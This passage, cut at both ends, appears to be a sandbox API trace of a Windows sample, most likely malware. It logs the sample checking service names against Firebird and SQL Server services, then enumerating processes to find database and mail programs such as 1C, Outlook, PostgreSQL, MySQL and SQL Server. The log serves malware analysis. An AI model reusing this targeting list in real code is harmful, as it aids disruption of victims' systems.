lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0276.819] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0276.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0276.819] lstrlenW (lpString="gpsvc") returned 5 [0276.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0276.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0276.819] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0276.819] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0276.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0276.819] lstrlenW (lpString="iphlpsvc") returned 8 [0276.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0276.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0276.819] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0276.819] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0276.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0276.819] lstrlenW (lpString="LanmanServer") returned 12 [0276.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0276.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0276.819] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0276.819] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0276.819] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0276.819] lstrlenW (lpString="LanmanWorkstation") returned 17 [0276.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0276.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0276.820] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0276.820] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0276.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0276.820] lstrlenW (lpString="lmhosts") returned 7 [0276.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0276.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0276.820] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0276.820] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0276.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0276.820] lstrlenW (lpString="MMCSS") returned 5 [0276.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0276.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0276.820] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0276.820] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0276.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0276.820] lstrlenW (lpString="MpsSvc") returned 6 [0276.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0276.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0276.820] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0276.820] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0276.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0276.820] lstrlenW (lpString="NlaSvc") returned 6 [0276.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0276.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0276.820] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0276.820] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0276.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0276.820] lstrlenW (lpString="nsi") returned 3 [0276.820] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0276.820] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0276.820] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0276.820] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0276.820] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0276.821] lstrlenW (lpString="PcaSvc") returned 6 [0276.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0276.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0276.821] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0276.821] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0276.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0276.821] lstrlenW (lpString="PlugPlay") returned 8 [0276.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0276.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0276.821] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0276.821] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0276.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0276.821] lstrlenW (lpString="Power") returned 5 [0276.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0276.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0276.821] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0276.821] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0276.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0276.821] lstrlenW (lpString="ProfSvc") returned 7 [0276.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0276.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0276.821] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0276.821] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0276.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0276.821] lstrlenW (lpString="RpcEptMapper") returned 12 [0276.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0276.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0276.821] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0276.821] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0276.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0276.821] lstrlenW (lpString="RpcSs") returned 5 [0276.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0276.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0276.821] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0276.822] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0276.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0276.822] lstrlenW (lpString="SamSs") returned 5 [0276.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0276.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0276.822] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0276.822] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0276.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0276.822] lstrlenW (lpString="Schedule") returned 8 [0276.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0276.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0276.822] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0276.822] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0276.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0276.822] lstrlenW (lpString="SENS") returned 4 [0276.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0276.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0276.822] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0276.822] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0276.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0276.822] lstrlenW (lpString="ShellHWDetection") returned 16 [0276.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0276.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0276.822] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0276.822] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0276.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0276.823] lstrlenW (lpString="Spooler") returned 7 [0276.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0276.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0276.823] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0276.823] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0276.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0276.823] lstrlenW (lpString="SysMain") returned 7 [0276.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0276.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0276.823] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0276.823] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0276.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0276.823] lstrlenW (lpString="Themes") returned 6 [0276.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0276.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0276.823] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0276.823] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0276.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0276.823] lstrlenW (lpString="TrkWks") returned 6 [0276.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0276.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0276.823] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0276.823] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0276.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0276.823] lstrlenW (lpString="UxSms") returned 5 [0276.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0276.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0276.823] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0276.823] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0276.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0276.823] lstrlenW (lpString="Winmgmt") returned 7 [0276.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0276.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0276.824] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0276.824] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0276.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0276.824] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0276.824] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0276.825] Process32FirstW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.825] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0276.825] lstrlenW (lpString="System") returned 6 [0276.825] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0276.825] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0276.825] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0276.825] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0276.825] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0276.825] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0276.825] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0276.825] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0276.826] lstrlenW (lpString="smss.exe") returned 8 [0276.826] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0276.826] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0276.826] lstrlenW (lpString="csrss.exe") returned 9 [0276.826] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0276.826] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0276.826] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0276.826] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0276.826] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0276.826] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0276.826] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0276.826] lstrlenW (lpString="wininit.exe") returned 11 [0276.827] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0276.827] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0276.827] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0276.827] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0276.827] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0276.827] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0276.827] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0276.827] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0276.827] lstrlenW (lpString="csrss.exe") returned 9 [0276.827] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0276.827] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0276.827] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0276.827] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0276.827] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0276.827] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0276.827] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0276.827] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0276.827] lstrlenW (lpString="winlogon.exe") returned 12 [0276.827] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0276.827] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0276.828] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0276.828] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0276.828] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0276.828] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0276.828] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0276.828] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0276.828] lstrlenW (lpString="services.exe") returned 12 [0276.828] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0276.828] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0276.828] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0276.828] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0276.828] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0276.828] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0276.828] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0276.828] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0276.828] lstrlenW (lpString="lsass.exe") returned 9 [0276.828] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0276.828] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0276.828] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0276.828] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0276.828] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0276.829] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0276.829] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0276.829] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0276.829] lstrlenW (lpString="lsm.exe") returned 7 [0276.829] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0276.829] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0276.829] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0276.829] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0276.829] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0276.829] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0276.829] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0276.829] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.829] lstrlenW (lpString="svchost.exe") returned 11 [0276.829] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0276.829] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0276.829] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0276.829] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0276.829] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0276.829] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0276.830] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.830] lstrlenW (lpString="svchost.exe") returned 11 [0276.830] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.830] lstrlenW (lpString="svchost.exe") returned 11 [0276.830] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.830] lstrlenW (lpString="svchost.exe") returned 11 [0276.830] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.831] lstrlenW (lpString="svchost.exe") returned 11 [0276.831] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0276.831] lstrlenW (lpString="audiodg.exe") returned 11 [0276.831] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.831] lstrlenW (lpString="svchost.exe") returned 11 [0276.831] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.831] lstrlenW (lpString="svchost.exe") returned 11 [0276.832] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0276.832] lstrlenW (lpString="userinit.exe") returned 12 [0276.832] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0276.832] lstrlenW (lpString="dwm.exe") returned 7 [0276.832] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0276.832] lstrlenW (lpString="explorer.exe") returned 12 [0276.832] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0276.833] lstrlenW (lpString="spoolsv.exe") returned 11 [0276.833] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0276.833] lstrlenW (lpString="taskhost.exe") returned 12 [0276.833] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.833] lstrlenW (lpString="svchost.exe") returned 11 [0276.833] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, 